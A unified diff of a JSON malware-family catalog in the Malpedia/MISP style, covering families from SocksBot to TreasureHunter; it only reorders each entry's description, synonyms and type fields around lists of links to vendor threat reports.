"Socks5 Systemz" }, { + "description": "", "meta": { - "synonyms": [ - "BIRDDOG", - "Nadrac" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] + ], + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", - "value": "SocksBot", - "description": "" + "value": "SocksBot" }, { + "description": "", "meta": { - "synonyms": [ - "Napolar" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" - ] + ], + "synonyms": [ + "Napolar" + ], + "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", - "value": "Solarbot", - "description": "" + "value": "Solarbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", - "value": "soraya", - "description": "" + "value": "soraya" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", - "value": "Sorgu", - "description": "" + "value": "Sorgu" }, { + "description": "", "meta": { - "synonyms": [ - "denis" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] + ], + "synonyms": [ + "denis" + ], + "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": "SOUNDBITE", - "description": "" + "value": "SOUNDBITE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", - "value": "Spedear", - "description": "" + "value": "Spedear" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "http://malware-traffic-analysis.net/2017/01/17/index2.html", @@ -13383,573 +13385,571 @@ "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "" + "value": "Spora" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", - "value": "SpyBot", - "description": "" + "value": "SpyBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "", - "value": "", - "description": "" + "value": "" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "" + "value": "SquirtDanger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "" + "value": "SslMM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "" + "value": "Stabuniq" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", - "value": "Stampedo", - "description": "" + "value": "Stampedo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "" + "value": "StarCruft" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "" + "value": "StarLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "" + "value": "StarsyPound" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "" + "value": "StegoLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "" + "value": "Stinger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", - "value": "Stration", - "description": "" + "value": "Stration" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "" + "value": "Stresspaint" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", - "value": "StrongPity", - "description": "" + "value": "StrongPity" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "" + "value": "Stuxnet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "" + "value": "SunOrcal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", - "value": "SuppoBox", - "description": "" + "value": "SuppoBox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?", - "description": "" + "value": "Swift?" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "" + "value": "Sword" }, { + "description": "", "meta": { - "synonyms": [ - "getkys" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.symantec.com/connect/blogs/sykipot-attacks", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://community.rsa.com/thread/185437" - ] + ], + "synonyms": [ + "getkys" + ], + "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "" + "value": "sykipot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "" + "value": "SynAck" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", - "value": "SyncCrypt", - "description": "" + "value": "SyncCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "" + "value": "SynFlooder" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": "Synth Loader", - "description": "" + "value": "Synth Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "" + "value": "Sys10" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "" + "value": "Syscon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "" + "value": "SysGet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", - "value": "SysScan", - "description": "" + "value": "SysScan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "" + "value": "Szribi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "" + "value": "TabMsgSQL" }, { + "description": "", "meta": { - "synonyms": [ - "simbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] + ], + "synonyms": [ + "simbot" + ], + "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "" + "value": "taidoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "" + "value": "Taleret" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", - "value": "Tandfuy", - "description": "" + "value": "Tandfuy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", - "value": "Tapaoux", - "description": "" + "value": "Tapaoux" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "" + "value": "Tarsip" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", - "value": "tDiscoverer", - "description": "" + "value": "tDiscoverer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", - "value": "TDTESS", - "description": "" + "value": "TDTESS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "" + "value": "TeleBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "" + "value": "TeleDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", - "value": "Tempedreve", - "description": "" + "value": "Tempedreve" }, { + "description": "", "meta": { - "synonyms": [ - "Fakem RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] + ], + "synonyms": [ + "Fakem RAT" + ], + "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", - "value": "Terminator RAT", - "description": "" + "value": "Terminator RAT" }, { + "description": "", "meta": { - "synonyms": [ - "cryptesla" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", @@ -13960,102 +13960,100 @@ "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" - ] + ], + "synonyms": [ + "cryptesla" + ], + "type": [] }, "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", - "value": "TeslaCrypt", - "description": "" + "value": "TeslaCrypt" }, { + "description": "", "meta": { - "synonyms": [ - "Alphabot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" - ] + ], + "synonyms": [ + "Alphabot" + ], + "type": [] }, "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", - "value": "Thanatos", - "description": "" + "value": "Thanatos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", - "value": "Thanatos Ransomware", - "description": "" + "value": "Thanatos Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", - "value": "ThreeByte", - "description": "" + "value": "ThreeByte" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", - "value": "ThumbThief", - "description": "" + "value": "ThumbThief" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", - "value": "Thunker", - "description": "" + "value": "Thunker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", - "value": "Tidepool", - "description": "" + "value": "Tidepool" }, { + "description": "", "meta": { - "synonyms": [ - "Zusy", - "TinyBanker", - "Illi" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", @@ -14068,34 +14066,33 @@ "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" - ] + ], + "synonyms": [ + "Zusy", + "TinyBanker", + "Illi" + ], + "type": [] }, "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", - "value": "Tinba", - "description": "" + "value": "Tinba" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", - "value": "TinyLoader", - "description": "" + "value": "TinyLoader" }, { + "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { - "synonyms": [ - "NukeBot", - "Nuclear Bot", - "MicroBankingTrojan", - "Xbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", @@ -14106,106 +14103,107 @@ "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", "https://krebsonsecurity.com/tag/nuclear-bot/" - ] + ], + "synonyms": [ + "NukeBot", + "Nuclear Bot", + "MicroBankingTrojan", + "Xbot" + ], + "type": [] }, "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", - "value": "TinyNuke", - "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." + "value": "TinyNuke" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", - "value": "TinyTyphon", - "description": "" + "value": "TinyTyphon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", - "value": "TinyZbot", - "description": "" + "value": "TinyZbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", - "value": "Tiop", - "description": "" + "value": "Tiop" }, { + "description": "", "meta": { - "synonyms": [ - "Gheg" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" - ] + ], + "synonyms": [ + "Gheg" + ], + "type": [] }, "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", - "value": "Tofsee", - "description": "" + "value": "Tofsee" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", - "value": "TorrentLocker", - "description": "" + "value": "TorrentLocker" }, { + "description": "", "meta": { - "synonyms": [ - "huntpos" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", "http://adelmas.com/blog/treasurehunter.php", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" - ] + ], + "synonyms": [ + "huntpos" + ], + "type": [] }, "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", - "value": "TreasureHunter", - "description": "" + "value": "TreasureHunter" }, { + "description": "A financial Trojan believed to be a 